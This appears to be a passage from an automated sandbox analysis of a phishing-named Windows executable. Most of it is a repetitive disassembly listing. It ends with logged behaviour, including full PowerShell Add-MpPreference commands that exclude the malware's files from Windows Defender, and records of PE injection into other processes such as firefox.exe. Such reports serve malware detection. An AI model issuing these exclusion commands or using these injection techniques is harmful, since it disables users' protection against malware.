Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01958620 mov eax, dword ptr fs:[00000030h] 12_2_01958620
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0192262C mov eax, dword ptr fs:[00000030h] 12_2_0192262C
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0193C640 mov eax, dword ptr fs:[00000030h] 12_2_0193C640
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01952674 mov eax, dword ptr fs:[00000030h] 12_2_01952674
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019E866E mov eax, dword ptr fs:[00000030h] 12_2_019E866E
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019E866E mov eax, dword ptr fs:[00000030h] 12_2_019E866E
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0195A660 mov eax, dword ptr fs:[00000030h] 12_2_0195A660
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0195A660 mov eax, dword ptr fs:[00000030h] 12_2_0195A660
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019A89B3 mov esi, dword ptr fs:[00000030h] 12_2_019A89B3
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019A89B3 mov eax, dword ptr fs:[00000030h] 12_2_019A89B3
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019A89B3 mov eax, dword ptr fs:[00000030h] 12_2_019A89B3
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019329A0 mov eax, dword ptr fs:[00000030h] 12_2_019329A0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019329A0 mov eax, dword ptr fs:[00000030h] 12_2_019329A0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019329A0 mov eax, dword ptr fs:[00000030h] 12_2_019329A0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019329A0 mov eax, dword ptr fs:[00000030h] 12_2_019329A0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019329A0 mov eax, dword ptr fs:[00000030h] 12_2_019329A0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019329A0 mov eax, dword ptr fs:[00000030h] 12_2_019329A0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019329A0 mov eax, dword ptr fs:[00000030h] 12_2_019329A0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019329A0 mov eax, dword ptr fs:[00000030h] 12_2_019329A0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019329A0 mov eax, dword ptr fs:[00000030h] 12_2_019329A0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019329A0 mov eax, dword ptr fs:[00000030h] 12_2_019329A0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019329A0 mov eax, dword ptr fs:[00000030h] 12_2_019329A0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019329A0 mov eax, dword ptr fs:[00000030h] 12_2_019329A0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019329A0 mov eax, dword ptr fs:[00000030h] 12_2_019329A0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019209AD mov eax, dword ptr fs:[00000030h] 12_2_019209AD
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019209AD mov eax, dword ptr fs:[00000030h] 12_2_019209AD
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0192A9D0 mov eax, dword ptr fs:[00000030h] 12_2_0192A9D0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0192A9D0 mov eax, dword ptr fs:[00000030h] 12_2_0192A9D0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0192A9D0 mov eax, dword ptr fs:[00000030h] 12_2_0192A9D0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0192A9D0 mov eax, dword ptr fs:[00000030h] 12_2_0192A9D0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0192A9D0 mov eax, dword ptr fs:[00000030h] 12_2_0192A9D0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0192A9D0 mov eax, dword ptr fs:[00000030h] 12_2_0192A9D0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019549D0 mov eax, dword ptr fs:[00000030h] 12_2_019549D0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019EA9D3 mov eax, dword ptr fs:[00000030h] 12_2_019EA9D3
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019B69C0 mov eax, dword ptr fs:[00000030h] 12_2_019B69C0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019529F9 mov eax, dword ptr fs:[00000030h] 12_2_019529F9
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019529F9 mov eax, dword ptr fs:[00000030h] 12_2_019529F9
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019AE9E0 mov eax, dword ptr fs:[00000030h] 12_2_019AE9E0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019AC912 mov eax, dword ptr fs:[00000030h] 12_2_019AC912
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01918918 mov eax, dword ptr fs:[00000030h] 12_2_01918918
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01918918 mov eax, dword ptr fs:[00000030h] 12_2_01918918
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0199E908 mov eax, dword ptr fs:[00000030h] 12_2_0199E908
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0199E908 mov eax, dword ptr fs:[00000030h] 12_2_0199E908
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019A892A mov eax, dword ptr fs:[00000030h] 12_2_019A892A
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019B892B mov eax, dword ptr fs:[00000030h] 12_2_019B892B
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019A0946 mov eax, dword ptr fs:[00000030h] 12_2_019A0946
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019C4978 mov eax, dword ptr fs:[00000030h] 12_2_019C4978
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019C4978 mov eax, dword ptr fs:[00000030h] 12_2_019C4978
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019AC97C mov eax, dword ptr fs:[00000030h] 12_2_019AC97C
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01946962 mov eax, dword ptr fs:[00000030h] 12_2_01946962
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01946962 mov eax, dword ptr fs:[00000030h] 12_2_01946962
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01946962 mov eax, dword ptr fs:[00000030h] 12_2_01946962
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0196096E mov eax, dword ptr fs:[00000030h] 12_2_0196096E
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0196096E mov edx, dword ptr fs:[00000030h] 12_2_0196096E
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0196096E mov eax, dword ptr fs:[00000030h] 12_2_0196096E
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019AC89D mov eax, dword ptr fs:[00000030h] 12_2_019AC89D
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01920887 mov eax, dword ptr fs:[00000030h] 12_2_01920887
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0194E8C0 mov eax, dword ptr fs:[00000030h] 12_2_0194E8C0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0195C8F9 mov eax, dword ptr fs:[00000030h] 12_2_0195C8F9
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0195C8F9 mov eax, dword ptr fs:[00000030h] 12_2_0195C8F9
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019EA8E4 mov eax, dword ptr fs:[00000030h] 12_2_019EA8E4
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019AC810 mov eax, dword ptr fs:[00000030h] 12_2_019AC810
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01942835 mov eax, dword ptr fs:[00000030h] 12_2_01942835
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01942835 mov eax, dword ptr fs:[00000030h] 12_2_01942835
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01942835 mov eax, dword ptr fs:[00000030h] 12_2_01942835
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01942835 mov ecx, dword ptr fs:[00000030h] 12_2_01942835
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01942835 mov eax, dword ptr fs:[00000030h] 12_2_01942835
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01942835 mov eax, dword ptr fs:[00000030h] 12_2_01942835
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0195A830 mov eax, dword ptr fs:[00000030h] 12_2_0195A830
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019C483A mov eax, dword ptr fs:[00000030h] 12_2_019C483A
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019C483A mov eax, dword ptr fs:[00000030h] 12_2_019C483A
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01950854 mov eax, dword ptr fs:[00000030h] 12_2_01950854
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01924859 mov eax, dword ptr fs:[00000030h] 12_2_01924859
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01924859 mov eax, dword ptr fs:[00000030h] 12_2_01924859
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019AE872 mov eax, dword ptr fs:[00000030h] 12_2_019AE872
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019AE872 mov eax, dword ptr fs:[00000030h] 12_2_019AE872
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019B6870 mov eax, dword ptr fs:[00000030h] 12_2_019B6870
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019B6870 mov eax, dword ptr fs:[00000030h] 12_2_019B6870
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01930BBE mov eax, dword ptr fs:[00000030h] 12_2_01930BBE
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01930BBE mov eax, dword ptr fs:[00000030h] 12_2_01930BBE
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019D4BB0 mov eax, dword ptr fs:[00000030h] 12_2_019D4BB0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019D4BB0 mov eax, dword ptr fs:[00000030h] 12_2_019D4BB0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019CEBD0 mov eax, dword ptr fs:[00000030h] 12_2_019CEBD0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01940BCB mov eax, dword ptr fs:[00000030h] 12_2_01940BCB
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01940BCB mov eax, dword ptr fs:[00000030h] 12_2_01940BCB
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01940BCB mov eax, dword ptr fs:[00000030h] 12_2_01940BCB
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01920BCD mov eax, dword ptr fs:[00000030h] 12_2_01920BCD
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01920BCD mov eax, dword ptr fs:[00000030h] 12_2_01920BCD
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01920BCD mov eax, dword ptr fs:[00000030h] 12_2_01920BCD
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01928BF0 mov eax, dword ptr fs:[00000030h] 12_2_01928BF0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01928BF0 mov eax, dword ptr fs:[00000030h] 12_2_01928BF0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01928BF0 mov eax, dword ptr fs:[00000030h] 12_2_01928BF0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0194EBFC mov eax, dword ptr fs:[00000030h] 12_2_0194EBFC
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019ACBF0 mov eax, dword ptr fs:[00000030h] 12_2_019ACBF0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0199EB1D mov eax, dword ptr fs:[00000030h] 12_2_0199EB1D
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0199EB1D mov eax, dword ptr fs:[00000030h] 12_2_0199EB1D
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0199EB1D mov eax, dword ptr fs:[00000030h] 12_2_0199EB1D
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0199EB1D mov eax, dword ptr fs:[00000030h] 12_2_0199EB1D
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0199EB1D mov eax, dword ptr fs:[00000030h] 12_2_0199EB1D
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0199EB1D mov eax, dword ptr fs:[00000030h] 12_2_0199EB1D
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0199EB1D mov eax, dword ptr fs:[00000030h] 12_2_0199EB1D
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0199EB1D mov eax, dword ptr fs:[00000030h] 12_2_0199EB1D
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0199EB1D mov eax, dword ptr fs:[00000030h] 12_2_0199EB1D
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0194EB20 mov eax, dword ptr fs:[00000030h] 12_2_0194EB20
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0194EB20 mov eax, dword ptr fs:[00000030h] 12_2_0194EB20
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019E8B28 mov eax, dword ptr fs:[00000030h] 12_2_019E8B28
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019E8B28 mov eax, dword ptr fs:[00000030h] 12_2_019E8B28
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019CEB50 mov eax, dword ptr fs:[00000030h] 12_2_019CEB50
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019D4B4B mov eax, dword ptr fs:[00000030h] 12_2_019D4B4B
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019D4B4B mov eax, dword ptr fs:[00000030h] 12_2_019D4B4B
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019B6B40 mov eax, dword ptr fs:[00000030h] 12_2_019B6B40
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019B6B40 mov eax, dword ptr fs:[00000030h] 12_2_019B6B40
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019C8B42 mov eax, dword ptr fs:[00000030h] 12_2_019C8B42
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019EAB40 mov eax, dword ptr fs:[00000030h] 12_2_019EAB40
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0191CB7E mov eax, dword ptr fs:[00000030h] 12_2_0191CB7E
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01958A90 mov edx, dword ptr fs:[00000030h] 12_2_01958A90
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0192EA80 mov eax, dword ptr fs:[00000030h] 12_2_0192EA80
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0192EA80 mov eax, dword ptr fs:[00000030h] 12_2_0192EA80
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0192EA80 mov eax, dword ptr fs:[00000030h] 12_2_0192EA80
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0192EA80 mov eax, dword ptr fs:[00000030h] 12_2_0192EA80
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0192EA80 mov eax, dword ptr fs:[00000030h] 12_2_0192EA80
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0192EA80 mov eax, dword ptr fs:[00000030h] 12_2_0192EA80
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0192EA80 mov eax, dword ptr fs:[00000030h] 12_2_0192EA80
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0192EA80 mov eax, dword ptr fs:[00000030h] 12_2_0192EA80
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0192EA80 mov eax, dword ptr fs:[00000030h] 12_2_0192EA80
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019F4A80 mov eax, dword ptr fs:[00000030h] 12_2_019F4A80
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01928AA0 mov eax, dword ptr fs:[00000030h] 12_2_01928AA0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01928AA0 mov eax, dword ptr fs:[00000030h] 12_2_01928AA0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01976AA4 mov eax, dword ptr fs:[00000030h] 12_2_01976AA4
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01920AD0 mov eax, dword ptr fs:[00000030h] 12_2_01920AD0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01954AD0 mov eax, dword ptr fs:[00000030h] 12_2_01954AD0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01954AD0 mov eax, dword ptr fs:[00000030h] 12_2_01954AD0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01976ACC mov eax, dword ptr fs:[00000030h] 12_2_01976ACC
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01976ACC mov eax, dword ptr fs:[00000030h] 12_2_01976ACC
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01976ACC mov eax, dword ptr fs:[00000030h] 12_2_01976ACC
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0195AAEE mov eax, dword ptr fs:[00000030h] 12_2_0195AAEE
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0195AAEE mov eax, dword ptr fs:[00000030h] 12_2_0195AAEE
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019ACA11 mov eax, dword ptr fs:[00000030h] 12_2_019ACA11
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01944A35 mov eax, dword ptr fs:[00000030h] 12_2_01944A35
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01944A35 mov eax, dword ptr fs:[00000030h] 12_2_01944A35
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0195CA38 mov eax, dword ptr fs:[00000030h] 12_2_0195CA38
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0195CA24 mov eax, dword ptr fs:[00000030h] 12_2_0195CA24
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0194EA2E mov eax, dword ptr fs:[00000030h] 12_2_0194EA2E
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01926A50 mov eax, dword ptr fs:[00000030h] 12_2_01926A50
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01926A50 mov eax, dword ptr fs:[00000030h] 12_2_01926A50
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01926A50 mov eax, dword ptr fs:[00000030h] 12_2_01926A50
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01926A50 mov eax, dword ptr fs:[00000030h] 12_2_01926A50
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01926A50 mov eax, dword ptr fs:[00000030h] 12_2_01926A50
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01926A50 mov eax, dword ptr fs:[00000030h] 12_2_01926A50
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01926A50 mov eax, dword ptr fs:[00000030h] 12_2_01926A50
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01930A5B mov eax, dword ptr fs:[00000030h] 12_2_01930A5B
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01930A5B mov eax, dword ptr fs:[00000030h] 12_2_01930A5B
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0199CA72 mov eax, dword ptr fs:[00000030h] 12_2_0199CA72
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0199CA72 mov eax, dword ptr fs:[00000030h] 12_2_0199CA72
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0195CA6F mov eax, dword ptr fs:[00000030h] 12_2_0195CA6F
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0195CA6F mov eax, dword ptr fs:[00000030h] 12_2_0195CA6F
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0195CA6F mov eax, dword ptr fs:[00000030h] 12_2_0195CA6F
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019CEA60 mov eax, dword ptr fs:[00000030h] 12_2_019CEA60
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0195CDB1 mov ecx, dword ptr fs:[00000030h] 12_2_0195CDB1
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0195CDB1 mov eax, dword ptr fs:[00000030h] 12_2_0195CDB1
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0195CDB1 mov eax, dword ptr fs:[00000030h] 12_2_0195CDB1
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01948DBF mov eax, dword ptr fs:[00000030h] 12_2_01948DBF
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01948DBF mov eax, dword ptr fs:[00000030h] 12_2_01948DBF
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019E8DAE mov eax, dword ptr fs:[00000030h] 12_2_019E8DAE
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019E8DAE mov eax, dword ptr fs:[00000030h] 12_2_019E8DAE
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019F4DAD mov eax, dword ptr fs:[00000030h] 12_2_019F4DAD
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01956DA0 mov eax, dword ptr fs:[00000030h] 12_2_01956DA0
Enables debug privileges
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Memory written: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Memory written: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF613480000 value starts with: 4D5A
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: NULL target: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: NULL target: C:\Windows\SysWOW64\sdiagnhost.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Section loaded: NULL target: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: NULL target: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe protection: read write
